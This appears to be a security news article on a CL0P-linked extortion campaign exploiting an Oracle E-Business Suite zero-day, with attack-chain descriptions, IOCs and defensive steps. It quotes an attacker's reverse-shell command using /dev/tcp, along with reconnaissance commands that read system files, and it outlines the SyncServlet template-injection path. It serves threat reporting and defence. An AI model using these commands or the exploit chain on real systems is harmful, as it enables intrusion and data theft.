Oracle E-Business Suite Under Siege: An Extortion Campaign Exploits a Zero-Day and Forces Emergency Patches

Cloud
Share on Pinterest Share on LinkedIn

A joint effort by the Google Threat Intelligence Group (GTIG) and Mandiant has uncovered a large-scale extortion campaign leveraging a zero-day vulnerability in Oracle E-Business Suite (EBS). The actor behind the operation—who claims ties to the CL0P group—appears to have carried out months of silent intrusion, data exfiltration, and since September 29, 2025, a wave of emails sent to executives across multiple sectors to coerce payment. Oracle has issued emergency patches and urges immediate application.

What happened and why it matters

  • Main vector: exploitation of CVE-2025-61882 (CVSS 9.8) and exploitation of chains of vulnerabilities in EBS components exposed to the internet.
  • Timeline: activity detected since July 2025; consistent exploitation since August; extortion beginning September 29.
  • Target: Oracle EBS, a critical ERP system for finance, procurement, HR, and operations. Compromising EBS reduces or prevents lateral movement: sensitive data already resides there.
  • Modus operandi: the attacker sends extortion emails from compromised third-party accounts (credentials obtained via infostealer malware), displaying actual lists of stolen EBS files to add credibility.
  • CL0P brand: the infrastructure and artifacts resemble historical campaigns linked to this ecosystem and to FIN11, though no definitive attribution has been established.

How it gets in: two chains attacking EBS

1) UiServlet (pre-July / post-July with failed attempts)

Requests to /OA_HTML/configurator/UiServlet combine SSRF, CRLF injection, authentication bypass, and XSL injection to achieve Remote Code Execution (RCE). Both Linux commands (via bash) and Windows commands (via cmd.exe) have been observed. After July patches, some attempts show timeouts in logs, indicating partial mitigation.

2) SyncServlet (from August onward, unauthenticated)

Attacks on /OA_HTML/SyncServlet allow unauthenticated RCE through the XDO Template Manager:

  1. POST to SyncServlet.
  2. Create a malicious XDO template in the database (XDO_TEMPLATES_B / XDO_LOBS), with a TEMPLATE_CODE that usually starts with TMP or DEF and a TemplateType set to XSL-TEXT or XML.
  3. Trigger the payload via Template Preview with a URL like:
    /OA_HTML/OA.jsp?page=/oracle/apps/xdo/oa/template/webui/TemplatePreviewPG&TemplateCode=&TemplateType=

The XSL payload embeds Java code encoded in Base64, which loads additional stages in memory.

What’s inside: GOLDVEIN.JAVA and the SAGE family*

  • GOLDVEIN.JAVA (downloader): Java variant of GOLDVEIN that connects to C2 (disguised as a fake “TLSv3.1”) to fetch second-stage payloads. Execution results can appear “camouflaged” within HTML comments.
  • SAGE chain*:
    • SAGEGIFT: loader that is reflective for WebLogic.
    • SAGELEAF: dropping in-memory loader that installs SAGEWAVE.
    • SAGEWAVE: a persistent servlet filter accepting an encrypted ZIP with AES containing Java classes. Variants require a fixed X-ORACLE-DMS-ECID header and filter paths containing /help/.../iHelp/ or /support/.../iHelp/.

Once RCE is achieved, commands for reconnaissance are executed as applmgr (e.g., df -h, ip addr, netstat -an, cat /etc/hosts, /etc/fstab, ARP, pings), along with reverse shells like bash -i >& /dev/tcp// 0>&1.

Extortion with pressure tactics

The extortion emails do not include ransom amounts or initial payment channels; instead, they request contact via associated CL0P ecosystem inboxes and show proof (file listings) to legitimize access. Following previous patterns, victims are not disclosed immediately on their leak site: they wait to negotiate and increase pressure.

Why this case raises the risk

  • ERP as a “safe box”: attacking EBS maximizes impact since critical data is already within the application.
  • “Fileless” artifacts: Java code loaded in memory and covert channels make SIEMs and antivirus tools less effective.
  • Scale and repetition: CL0P/FIN11 have demonstrated the ability to repeat this pattern: zero-day → mass exploitation → differed extortion.

Signals and IOCs that should trigger alerts

  • IPs observed: 200.107.207.26, 161.97.99.49.
  • Possible C2 servers for GOLDVEIN.JAVA: 162.55.17.215:443, 104.194.11.200:443.
  • Suspicious endpoints:
    • /OA_HTML/OA.jsp?page=/oracle/apps/xdo/oa/template/webui/TemplatePreviewPG (pay special attention if TemplateCode begins with TMP or DEF).
    • /OA_HTML/configurator/UiServlet.
    • /OA_HTML/SyncServlet.
    • Substrings: /help/state/content/destination./navId.1/navvSetId.iHelp/ and /support/state/content/destination./navId.1/navvSetId.iHelp/.
  • Processes: child processes of bash -i launched by Java under the applmgr account.
  • HTTP responses: containing “noisy” HTML comments that may include command output.

Immediate steps (in this order)

1) Patch now.
Apply the October emergency patches for EBS released in October and update the platform with the latest Critical Patch Updates. Closing CVE-2025-61882 and related chains prevents known entry points.

2) Audit XDO templates.
Check for recent creations in XDO_TEMPLATES_B and XDO_LOBS; review templates with TEMPLATE_CODE starting with TMP or DEF and verify XSL content that decodes Base64 and loads Java classes.

3) Block Internet egress from EBS servers.
Restrict all non-essential outbound traffic. These families require C2 for second stages and exfiltration. This control compensates even if the host is already compromised.

4) Enhance monitoring.
Deploy WAF/IDS with specific rules for UiServlet/SyncServlet, TemplatePreviewPG, and the iHelp routes. Increase log retention for access logs and implement detection of responses with anomalous HTML comments.

5) Conduct memory forensics if suspicion arises.
Dump Java processes from the EBS middleware; look for reflectively loaded classes and added filters.

6) Prepare for extortion response.
Develop playbooks covering legal, communication, and operational procedures. Do not interact without consultation; do not pay; coordinate with authorities and CSIRTs.

Quick tips for CIOs and CISOs

  • Inventory of exposure: identify which EBS instances are publicly accessible and what versions they run.
  • Zero egress segmentation: ensure EBS systems do not have outbound internet access.
  • Governance: enforce policies for templates and plugins in EBS; perform periodic reviews of XDO.
  • Tabletop exercises: simulate an extortion email scenario and walk through decision processes (technical, legal, regulatory).

Frequently Asked Questions (FAQ)

If I’ve already applied the October patches, am I safe?
While it greatly reduces the risk of further exploitation, you must verify whether there has been previous intrusion: audit XDO templates, examine endpoints, and review outgoing traffic.

How do I detect a malicious template in EBS?
Review XDO_TEMPLATES_B and XDO_LOBS for creation date and prefixes like TMP or DEF. Look for XSL containing Base64 and calls to Java classes. If found, treat the host as compromised.

Does blocking egress fix the problem?
It does not fix the server but breaks the chain (no C2, no second stage, no exfiltration). It is critical as part of patching and cleaning efforts.

Should I assume data has been exfiltrated?
The campaign includes cases of exfiltration. If IOCs are present, initiate forensics, conduct impact assessments, notify authorities if required, and develop communication plans for affected parties.

via: Oracle Security News and cloud.google.com

Share on Pinterest Share on LinkedIn
Scroll to Top